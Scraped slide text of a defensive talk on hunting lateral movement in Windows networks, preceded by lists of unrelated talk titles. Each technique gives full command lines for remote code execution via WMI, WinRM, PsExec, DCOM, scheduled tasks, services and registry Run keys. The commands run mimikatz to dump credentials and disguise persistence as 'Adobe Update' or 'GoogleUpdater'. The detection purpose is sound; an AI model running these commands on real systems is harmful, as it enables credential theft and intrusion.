Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
 
A complete guide to Node.js
A complete guide to Node.jsA complete guide to Node.js
A complete guide to Node.js
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
 
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
Tick Stack - Listen your infrastructure and please sleep
Tick Stack - Listen your infrastructure and please sleepTick Stack - Listen your infrastructure and please sleep
Tick Stack - Listen your infrastructure and please sleep
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
HashiCorp Vault Workshop:幫 Credentials 找個窩
HashiCorp Vault Workshop:幫 Credentials 找個窩HashiCorp Vault Workshop:幫 Credentials 找個窩
HashiCorp Vault Workshop:幫 Credentials 找個窩
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick Stack
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Get started with docker &amp; dev ops
Get started with docker &amp; dev opsGet started with docker &amp; dev ops
Get started with docker &amp; dev ops
 
Journey to the Cloud
Journey to the CloudJourney to the Cloud
Journey to the Cloud
 
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStorm
 
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
 

Recently uploaded

SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 

Kheirkhabarov24052017_phdays7

  • 1. Hunting Lateral Movement in Windows Infrastructure Teymur Kheirkhabarov
  • 2. Who Am I • Senior SOC Analyst @Kaspersky Lab • SibSAU (Krasnoyarsk) graduate • Ex- Infosec dept. head • Ex- Infosec admin • Ex- System admin • Twitter @HeirhabarovT • www.linkedin.com/in/teymur-kheirkhabarov-73490867/
  • 3. What are we going to talk about • Different ways to launch executables remotely by using compromised credentials and operating system functionality; • How to detect remotely launched executables with Windows Event and Sysmon logs.
  • 4. Remote file copy over SMB • Copy to autostart locations for execution on login or boot • Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service… • Programmatically • Using Explorer • Using standard console tools (copy, xcopy, ropocopy…): • robocopy C:tools pc0002ADMIN$userspublic mimikatz.exe • powershell Copy-Item -Path mimikatz.exe -Destination pc0002C$userspublic • cmd /c "copy mimikatz.exe pc0002C$userspublic" • xcopy mimikatz.exe pc0002C$ProgramDataMicrosoftWindowsStart MenuProgramsStartup How • TCP/455 port is accessible on remote host • Administrative shares are enabled on remote host Requirements & limitations
  • 5. Remote File Copy over SMB – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Administrative share access (Windows EID 5140/5145) E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
  • 6. Remote File Copy over SMB – the most interesting events
  • 7. Hunting: search for administrative shares connections
  • 9. Hunting: search for files creation/changes in autostart locations
  • 10. Remote execution via WMI • Programmatically • Using standard tools: • wmic /node:pc0002 process call create "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process - Name Create -ArgumentList '"cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"' • powershell -command "&{$process = [WMICLASS]'pc0002ROOTCIMV2:win32_process'; $process.Create('calc.exe'); }" • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = "Win32_Process"' -namespace 'rootcimv2' - computername pc0002; $process.Create( 'notepad.exe' );}" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
  • 11. Remote execution via WMI – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)
  • 12. Remote execution via WMI – the most interesting events
  • 13. Remote execution via WinRM • Programmatically • Using Windows Remote Shell (WinRS) tool: • winrs -r:pc0002.test.local C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit • winrs -r:pc0002.test.local -u:dadmin C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
  • 14. Remote execution via WinRM – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1) E4. WinrsHost.exe starts payload file (Sysmon EID 1)
  • 15. Remote execution via WinRM – the most interesting events
  • 16. Remote execution via Powershell Remoting • Powershell scripts • Powershell cmdline: • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • powershell Invoke-Command -ComputerName pc0002.test.local -credential TESTdadmin -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • Enter-PSSession -ComputerName COMPUTER -Credential USER How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
  • 17. Remote execution via Powershell Remoting – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1) E4. wsmprovhost.exe starts payload file (Sysmon EID 1)
  • 18. Remote execution via Powershell Remoting – the most interesting events
  • 19. Remote execution via MMC20.Application COM How • Programmatically • Using powershell: powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Appli cation','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt','7')}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
  • 20. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts mmc.exe (Sysmon EID 1) E4. mmc.exe starts payload file (Sysmon EID 1) Remote execution via MMC20.Application COM – events sequence on destination side
  • 21. Remote execution via MMC20.Application COM – the most interesting events
  • 22. Remote execution via PsExec (& clones, e.g. PaExec) • PsExex: • psexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit • PaExec: • paexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • ADMIN$ administrative share is enabled on remote host • TCP/445 port is accessible on remote host Requirements & limitations
  • 23. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145) E4. psexesvc service is installed and started (Windows EID 7045/7036) Remote execution via PsExec (& clones) – events sequence on destination side E5. psexesvc.exe is started by services.exe (Sysmon EID 1) E6. psexesvc.exe starts payload file (Sysmon EID 1) E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
  • 24. Remote execution via PsExec (& clones) – the most interesting events
  • 25. Hunting: search for PsExec (& clones) artifacts – services
  • 26. Hunting: search for PsExec (& clones) artifacts – access to pipes
  • 27. Remote execution via PsExec (& clones) – the most interesting events
  • 28. Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
  • 29. Remote execution via ShellWindows COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF- A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Execution with rights of currently logged user https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
  • 30. Remote execution via ShellBrowserWindow COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1- 8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Doesn’t work for Windows 7 destination • Execution with rights of currently logged user https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
  • 31. E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side E3. explorer.exe starts payload file in current session (Sysmon EID 1)
  • 32. Remote execution via via ShellWindows or ShellBrowserWindow COM – how to detect??? Payload file is executed in the session of the current active user
  • 33. Remote execution via Scheduled Tasks • Programmatically • Standard command line tools: • at 172.16.205.14 3:55 C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:userspublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" How • TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage) • TCP/445 port is accessible on remote host (in case of AT usage) Requirements & limitations
  • 34. Remote execution via Scheduled Tasks – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Access to atsvc SMB Pipe (Windows EID 5145) – in case of at.exe usage E6. taskeng.exe starts payload file (Sysmon EID 1) E4. Scheduled task is created or updated (Windows EID 4698/4702) E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1) Also there are some interesting events in Microsoft-Windows-TaskScheduler/Operational log
  • 35. Remote execution via Scheduled Tasks – the most interesting events
  • 36. Hunting: search for remotely created or updated scheduler tasks
  • 37. Remote execution via Scheduled Tasks – the most interesting events
  • 38. Hunting: search for ATSVC pipe connections
  • 39. Remote execution via Services • Programmatically • Standard command line tool: • sc pc0002 create "Remote service" binPath= "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" sc pc0002 start "Remote service" sc pc0002 delete »Remote service" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
  • 40. Remote execution via Services – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. New service is installed (Windows EID 7045/4697) E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1) E5. A timeout is reached (Windows EID 7009) E6. Failure while trying to start service (Windows EID 7000)
  • 41. Remote execution via Services – the most interesting events
  • 42. Hunting: search for remotely created services
  • 43. Remote registry How • Programmatically • Using powershell or reg: • reg add pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachin e", "pc0002"); $key=$reg.OpenSubKey("SOFTWAREMicrosoftWindowsCurrentVersionRu n",$True); $key.SetValue("GoogleUpdater","calc.exe");}" Requirements & limitations • TCP/445 port is accessible on remote host • Remote Registry service is enabled on remote host
  • 44. Remote registry – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WINREG pipe access (Windows EID 5145) E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
  • 45. Remote Registry – the most interesting events
  • 46. Hunting: search for WINREG pipe connections
  • 48. Hunting: search for changes in autostart registry keys
  • 49. Remote WMI subscriptions creation $filterName = 'TestFilter’ $consumerName = 'TestConsumer’ $exePath = 'C:WindowsSystem32calc.exe' $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320" $WMIEventFilter = Set-WmiInstance -ComputerName pc0002 -Class __EventFilter - NameSpace "rootsubscription" -Arguments @{Name=$filterName;EventNameSpace="rootcimv2";QueryLanguage="WQL";Query=$ Query} -ErrorAction Stop $WMIEventConsumer = Set-WmiInstance -ComputerName pc0002 -Class CommandLineEventConsumer -Namespace "rootsubscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath} Set-WmiInstance -ComputerName pc0002 -Class __FilterToConsumerBinding -Namespace "rootsubscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
  • 51. Remote WMI subscriptions creation – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
  • 52. Remote WMI subscriptions creation – the most interesting events
  • 53. The End  There are a lot of ways to remotely run executables in Windows infrastructure;  Most of them are based on the native capabilities of the Windows operating system;  Almost all of them can be detected via Windows or Sysmon logs analysis;  Out of scope: • exploitation of vulnerabilities; • third-party applications and software deployment systems (SCCM, Kaspersky Security Center, VNC, WSUS…).
  • 54. Teymur Kheirkhabarov • Twitter @HeirhabarovT • http://www.linkedin.com/in/teymur-kheirkhabarov-73490867/